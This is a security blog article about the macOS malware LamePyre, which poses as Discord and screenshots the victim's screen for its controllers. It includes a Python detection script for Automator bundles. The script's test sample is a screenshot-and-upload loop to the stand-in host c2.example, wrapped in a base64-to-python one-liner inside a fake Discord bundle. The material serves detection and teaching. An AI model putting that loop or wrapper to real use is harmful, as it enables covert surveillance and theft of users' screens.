This Mac Malware Takes Screenshots Of Your Computer

January 1, 2019

Written by wukovits

There’s a new malware threat in the macOS ecosystem called OSX.LamePyre. If you haven’t heard of it yet, it belongs on your radar.

At the moment, researchers describe it as a crude work in progress. Unfortunately, the danger of a crude work in progress is that its authors keep developing it, so the threat tends to get worse over time.

In this case, LamePyre is limited to maintaining a backdoor into the infected system and taking screenshots at periodic intervals, which it sends back to the hacker controlling the malware.

The only LamePyre sample found in the wild so far is disguised as the Discord messaging app, which is widely used by gamers. This poisoned version of Discord doesn’t actually function as a chat client: it is simply an Automator application wrapping a script, and it displays the generic Automator icon in the menu bar while it is running.

When a user runs the poisoned version of Discord, the Automator script decodes the malware payload, which is written in Python. The payload then begins taking screenshots at predefined intervals and sending them to the hacker’s command and control (C2) server.
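The traits described above (an Automator-built wrapper, a base64 blob decoded into a Python interpreter, a screenshot loop talking to a C2) are something an administrator can look for in a suspicious .app bundle. The scanner below is an added example written for this article, not code from the original page or from the malware; it assumes that an Automator application keeps its workflow at Contents/document.wflow (which Automator does), that a "Run Shell Script" action stores its command under a COMMAND_STRING key (an assumption; the scanner walks every string in the plist so it does not depend on that key), and that the indicator strings and the constructed sample payload are illustrative rather than LamePyre’s real source.

```python
"""Scan a macOS .app bundle for the traits the article attributes to
LamePyre's fake Discord: an Automator wrapper whose workflow decodes a
base64 blob into Python, and a payload that screenshots and phones home.
Added example, not code from the original page or from the malware.
"""
import base64
import os
import plistlib
import re
import shutil
import subprocess
import tempfile

# Indicators looked for inside the decoded payload. Chosen for the behaviour
# the article describes (screenshots, periodic loop, network C2); the exact
# strings are this example's assumption, not LamePyre's actual source.
PAYLOAD_INDICATORS = ("screencapture", "urlopen", "time.sleep", "while True")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def _strings(node):
    """Yield every string anywhere in a parsed plist (dicts, lists, scalars)."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        for v in node.values():
            yield from _strings(v)
    elif isinstance(node, list):
        for v in node:
            yield from _strings(v)


def scan_bundle(app_path):
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    wflow = os.path.join(app_path, "Contents", "document.wflow")
    if not os.path.isfile(wflow):
        return findings  # not an Automator-built app; nothing to inspect here
    findings.append("automator_wrapper")  # what the article says LamePyre is
    with open(wflow, "rb") as fh:
        doc = plistlib.load(fh)
    for s in _strings(doc):
        # A shell one-liner that decodes base64 and pipes it into python.
        if re.search(r"base64\s+(-D|-d|--decode)", s) and "python" in s:
            findings.append("base64_to_python")
        for blob in B64_RUN.findall(s):
            try:
                decoded = base64.b64decode(blob, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue
            hits = [i for i in PAYLOAD_INDICATORS if i in decoded]
            if hits:
                findings.append("payload:" + ",".join(hits))
    # On macOS, also ask codesign: the genuine Discord app is signed, while an
    # Automator wrapper dropped by an attacker normally is not (skipped elsewhere).
    if shutil.which("codesign"):
        r = subprocess.run(["codesign", "--verify", "--strict", app_path],
                           capture_output=True)
        if r.returncode != 0:
            findings.append("unsigned_or_invalid_signature")
    return findings


# Constructed sample payload (hypothetical, never executed by this script):
# the kind of Python a screenshot backdoor would contain.
FAKE_PAYLOAD = """import time, urllib.request, subprocess
while True:
    subprocess.call(["screencapture", "-x", "/tmp/s.png"])
    urllib.request.urlopen("http://c2.example/upload", open("/tmp/s.png", "rb").read())
    time.sleep(60)
"""


def build_fake_bundle(root):
    """Write a minimal Automator-style bundle (constructed, not the real malware)."""
    app = os.path.join(root, "Discord.app")
    os.makedirs(os.path.join(app, "Contents"))
    b64 = base64.b64encode(FAKE_PAYLOAD.encode()).decode()
    # COMMAND_STRING is assumed to be where a Run Shell Script action keeps its command.
    workflow = {"actions": [{"action": {"ActionParameters": {
        "COMMAND_STRING": f"echo '{b64}' | base64 -D | python"}}}]}
    with open(os.path.join(app, "Contents", "document.wflow"), "wb") as fh:
        plistlib.dump(workflow, fh)
    with open(os.path.join(app, "Contents", "Info.plist"), "wb") as fh:
        plistlib.dump({"CFBundleName": "Discord"}, fh)
    return app


def demo():
    """Build the constructed bundle in a temp dir, scan it, and clean up."""
    root = tempfile.mkdtemp()
    try:
        return scan_bundle(build_fake_bundle(root))
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(demo())
```

Run it as-is to scan the constructed sample, or call scan_bundle("/Applications/Discord.app") on a real machine; a genuine Discord install has no document.wflow and returns an empty list, while an Automator wrapper of the kind described above is flagged on the first check alone, before any payload is decoded.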

There are two risks, then. First, the hacker who controls the script will see pretty much everything you’re working on. Second, since it opens a channel between the infected machine and the C2 server, it allows the hacker to push additional malware onto the system at will. Not good.

If you or anyone in your employ uses the Discord messaging app, this is an emerging threat to watch. The legitimate Discord client is not built with Automator, so a “Discord” that shows the Automator icon in the menu bar and never opens a chat window should be treated as malicious and removed. Fortunately, it’s easily removed and dealt with (for now), but that could change, since whoever created the app can build it out more completely and make it a significantly worse threat.

Used with permission from Article Aggregator
